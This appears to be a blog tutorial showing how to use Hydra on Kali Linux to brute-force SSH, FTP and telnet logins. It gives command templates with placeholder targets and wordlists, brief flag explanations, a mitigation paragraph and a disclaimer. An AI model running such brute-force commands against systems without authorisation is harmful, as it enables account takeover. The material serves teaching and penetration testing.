Hydra is a pre-installed tool in Kali Linux used to brute-force username and password to different services such as ftp, ssh, telnet, MS-SQL etc. Brute-force is a technique to try different username and password against a target to identify correct credentials. Below is the list of all protocols supported by hydra.
Check usage of Hydra by using of below command:
To brute-force ssh username and password
Create a username and password list to enumerate a target by using hydra automation tool. You can access wordlist in a directory by using below command.
-l: input login
-L: list of username
-p: single password
-P: list of passwords
#hydra <Target_IP> ssh -l <username> -P <password_file> -s 22 -vV
#hydra <Target_IP> ssh -l <username> -p <password> -s 22 -vV
To brute-force FTP username and password
#hydra -L <username_file> -P <password_file> ftp://<Target_IP>
#hydra -l <username> -p <password> ftp://<Target_IP>
To brute-force telnet username and password
#hydra -l <username> -p <password> telnet://<Target_IP>
Mitigation to avoid brute-force attack of username and password
Implementing account lockout, captcha implementation, complex password, two-factor authentication, hardware-based token authentication etc. are some of the techniques of avoiding brute-force attack on the target.
Subscribe us to receive more such articles updates in your email.
If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.